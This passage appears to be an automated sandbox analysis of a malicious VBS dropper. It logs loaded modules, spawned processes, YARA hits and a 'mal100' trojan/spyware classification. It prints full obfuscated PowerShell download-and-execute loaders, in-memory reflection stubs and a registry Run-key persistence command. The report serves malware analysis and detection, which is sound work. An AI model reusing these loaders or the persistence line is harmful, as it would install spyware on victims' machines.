          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: pcacli.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
          Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sfc_os.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)"
          Source: Process Memory Space: powershell.exe PID: 1628, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@22/16@13/4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\-A796ZW
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:768:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkr3sefb.x45.ps1
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BKGCONF-THD1914129-BKGCONF-THD1914129.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1960
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1628
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5312
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla 
,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea 
PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla ,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico Syste( Plum[B,ackIUbe knWartytS iveP ranst RgfarE.dot]Dekat:n nmo:Kon esAdreniKablizRet.me R,kl Deter-Se,ise I.teqTjera Nekro8forly)Scori ') ;if ($Imponderableness) {.$Determents
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Klassespecifikke.vbs"
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "obviously" /t REG_EXPAND_SZ /d "%Prefavor% -w 1 $Swampside=(Get-ItemProperty -Path 'HKCU:\Luftkonditioneringens\').Adresse;%Prefavor% ($Swampside)
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Cabinetted;++$Cabinetted;$Cabinetted=$Cabinetted-1;Function Cert69 ($Forretningsnavn){$Halvmaanedliges=5;$Halvmaanedliges++;For($Phylloscopine81=5; $Phylloscopine81 -lt $Forretningsnavn.Length-1; $Phylloscopine81+=$Halvmaanedliges){$Foreadapt = 'substring';$Slyngblte=$Forretningsnavn.$Foreadapt.Invoke($Phylloscopine81, 1);$Olfactible=$Olfactible+$Slyngblte}$Olfactible;}$uppishness=Cert69 'HypochfavnttDep.ct EkstpEl.dys Bowl: Libe/Snebo/Mornem IndiaBurnes DoomoOverl.ArmatgPolypeProj./ DesiwBeeswp Carp- Pr.va ygnid PanemEtaari AcrinFarad/KlassRT lkue BestcCompriResult Do seKartorKvi,keSupert Havo.Brn erVirusa Other In e ';$Wergilds=$uppishness.split([char]62);$uppishness=$Wergilds[0];$Batiste=Cert69 ' ForeiJurateAk hexMsurk ';$Sjusglas = Cert69 ' Lsni\ CymesNig eyVrtdys RediwNephroNuss wP.eud6Lymph4 Synt\havarWTan aicarponSam rdPol ro Dic.wIonpasAcardPResgso Arguw ReseeAnde rIndseS Frath sarceOmhyglPledglSeric\D plavSrdom1 .ytr.Rekur0St,ld\RepatpAlcoroskarpwUnorte,nglerUnagisIn.erhWifieeBlokel Flo.leuphe.NumereS.irixR,inoeParal ';&($Batiste) (Cert69 'Sterr$SkrivSAllo e Po.ykFe.lmsPos.tt Uncou Di.lr VrkssArgen=.onde$Ps.cheEpit.nBog nvTrla :m.ltew SbefiStrrenJ,rntd.amilisvrvgrGamet ') ;&($Batiste) (Cert69 'Askeb$Ra,gsS Cab,j O,gouSterss hiocgLarl.l GasbaAssems Per,=Cinqu$SarcoSVaabeeLit.ukUnm.nsRetintcompuuSkri,r luttsHanhu+Fravl$RelegS ndejSicyouPropos SplagmildelCr ssaFrotts S.rv ') ;&($Batiste) (Cert69 'Wayl,$CensuL LangeUnme.a llefCimb,wSilkeoBlderrAndelm ntes Fl.e Doku=Unrep Vexed(Afmel( ImaggTomhjwBagtrmHana.i Ev.n KursuwbortviProclnUdkrn3Uover2N.npa_Chinkp DietrJoggioOccupc DetoeDemensPseudsAxost propa-O.bytFLunyi IsoenPSeriorUnhypoTranscHatcheB,shbsolofss ubveItraved Appr=F.rre$Under{EthicP.unstI PhaeDUnpud}tvang),isco.TegucCAntaloU dermA socmP.digaF rtinmelildUkvemLAerosi 
OxygnChloreGitt.)Downh Boble-contrsUnnimp enetlWe biiUndert enfe Payi [Sleigc Ari,hBet aaSkkevr Acid]Un.in3Gevin4 opfi ');&($Batiste) (Cert69 'Krybe$ kretFHomofeRekrnmPol.ttAflydemil in TescaAudioaScenarConnis Kond Til =Disin Angli$Fu,dsL.isexeKontraSold,f KvalwChacro BrygrKaeftmCr.tisArr y[Krysa$ juniLnyanseByggea Sho,fLegemwimpoloVidtlrLakfamDuniesQ,adr.Quak cRespeoA.rusu onen,omictFerth- omkl2C,omp]Erst, ');&($Batiste) (Cert69 ' Unde$ .ircFbraysaKragesKmpehe UnstrBrystuTransmHoved= rrie( AdskT QualeAfgrssIntertUitot-Ra.urP.ompaaCrotctRegnsh npac Semit$c,ltoSDeaccj Tostu,rylls Udskg pseulFalbyaEncrysLi,id)Cereb N.rve-Kam.eA DrifnApperdS.alc Fu te(B.lan[SymboI Oro n ronatBrom,PkvalitScurrrNonfr]Uorga:Toba.:B.ithsUbevgi Forsz SquaeP,eud Scarl-Leucoe .illqCorad Distr8Palli)Manip ') ;if ($Faserum) {.$Sjusglas $Femtenaars;} else {;$Thysen=Cert69 'Ant.cSKogeptReaccaFysiorUnschtCalli-Ing.oBSengei,ircut FrdesSinusTTresirFicu.aCabbanQuonssHjem.f Melle.rbitr Hvae Verti- FidgSStemmoRgto,uWulfer FordcPernieGudst Fors $Unpa,uNitnipHybripDig eiLilyas SherhAlbat
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("POWERSHELL.exe", ""++$Skatepark;++$Skatepark;$Skatepark=$", "", "", "0");
          Source: Yara match File source: 00000005.00000002.2804900033.0000000008CCE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.2804880582.0000000008BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.2798516549.00000000058B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tredobl $Clotures $Druelighedens), (Octolateral @([IntPtr], [UInt32]) ([IntPtr])))$Callipygias89 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.Global
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Megawatten)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Rostbffers, $false).DefineType($Suffleringerne
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Frifundnes249)$Undone239 = [System.Text.Encoding]::ASCII.GetString($Malgr)$Dimetrodon=$Undone239.substring(336547,25818)<#Glimmering Enkeltdeln jungmndenes #>Function Sinew($Orthodox
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Diapositiver $Pyloristenosis $Siricoidea), (Badevgtene @([IntPtr], [UInt32]) ([IntPtr])))$Operatrerne = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.G
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Grundforskningsfond)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Num146, $false).DefineType($moentenhe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Nectandra)$Nonperversive = [System.Text.Encoding]::ASCII.GetString($omkarterings)$Joggingtj=$Nonperversive.substring(296531,25873)<#Syntaxis Psykoanalytikernes Baronetage karbonats A
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Skatepark;++$Skatepark;$Skatepark=$Skatepark-1;Function quenchlessness ($Kineser){$Unenterprised=5;$Unenterprised++;For($Calin=5; $Calin -lt $Kineser.Length-1; $Calin+=$Unenterprised){$Universitetsstillinger = 'substring';$Bjorn181=$Kineser.$Universitetsstillinger.Invoke($Calin, 1);$Windlestrae27=$Windlestrae27+$Bjorn181}$Windlestrae27;}$Planteskoles=quenchlessness 'TrommhJallst Disct egerpAbb ksKrill:Lands/Invin/KrselbA,armrSa psuFarcesFlakktT.itoi.athoaSusc,a vestl BegyfFum daHinge.D,putwFodbreAu,orbKr stsCylini BetanOppus. TydniTry.ltImpi,/,hyllPLejebrFremsoFrededWoolsu SugakOldebt LampiTndinoTar.knMidscsE cephDownla.istal MyoblSko peRibbin TilhsCrimi.bill tAttaihNoedbn Book ';$Udenrigsredaktrerne=$Planteskoles.split([char]62);$Planteskoles=$Udenrigsredaktrerne[0];$Affattendes62=quenchlessness ' Si.ki.acroeRestixAbear ';$Determents = quenchlessness 'Ilksc\S,bsis B,mbyTalegsFlagewAvleroBonifwRandp6 Synt4Ba.om\ HypoW dityimidesnNoma,d randorejouwChok sSpec,PLinneo VandwDri he Kn prOverrSPo,yghJuvene VamplS bstlLuxem\GaussvMusc 1A,koh.Vid,l0Ronsa\MonebpHa.anoBarnsw,rimlehenslr OversPreouhSaerde .quilAabenl Sesq.,rikaeOverfxBaj,reBrusk ';&($Affattendes62) (quenchlessness 'Gur.e$.ronoVCryogaNond,lZantcs ScrieSta.dnAgalld EthieAle osSkamf=Regel$Congreafpl nErh evUs kk:Mng.ewMoneyiL,mbunForandOrieniP ebercyclo ') ;&($Affattendes62) (quenchlessness 'Svejs$LigsyDKursneKultitInvese R,plrFuttomHoverel,ngunBlodbtRamposBushn=Ti.ca$Aug.sV RigsaKampflKultusNon.ieGenern horud ElmaeForsksLovo.+normf$FavntDCe aseB,tastEctopeCluckr D,somDragre Pakkn Lystt Armbs ram ') ;&($Affattendes62) (quenchlessness ' opl$ Kur,CSkrivaPla.tlBuckhvApproipaafytBint.y Biff kolla=S osn alcyo( Aspe( ChaigGo erwIndermPl ini idea PelliwBilliiFlyd.n.chis3Mon,z2Kondo_Ces.ipSuiverOmbrooRom.ncLivsne mdirsScraisTilla 
,esod-BombeFKultu KeraPJvn nr Adelo.ankmcMi.seeRetinsReharsAlangISuperd nonr=Takke$looky{NakkeP La.rIKonfeDHy ro}Heth.)Subsu.marveCWebbioRdnesm Ivy mPalerasletbnS.romdStikdL HystiFoedsnsp.ose Coms)Preex Purch-Syr.isSkkebpAfstelParaniTaftktPan.o Fuldf[nonpec TumbhS,blia AscarAlmon]Bunds3 Fr d4Pseud ');&($Affattendes62) (quenchlessness 'Nedra$F.rvoHTermlaPasquvOver aInd,vr HaantH.emmiLods s Samf Micr=Scrag Torv,$geleeC .veraAleurlSkrppv IncoiFyrettSyn.byStil.[Brass$CamomC P,maaKlitolO.kupvNaturiPret,t SepayPhyco.ArbejcCh rooOmbuduUncasnStraftGlide-Salgs2Sakis] arne ');&($Affattendes62) (quenchlessness ' Mese$OverbIHjer,m S ftpDestroWithnnGe.tadDyrkeeBukser Algoa.pecibforlalBrumseHil.bn.ndtae Ve,ss Aques Mart=Ladyk(krligT Sophe Dat suddebtSketc- BuffPFdemia Nonst TranhEdvin .ncov$ Ge,eDStrmae TujatTyrkeeSpinur Reinm elieCerebnLand,tNogets Unr.) d,ne Reg,b-CinciAElocunOpfoedSpico 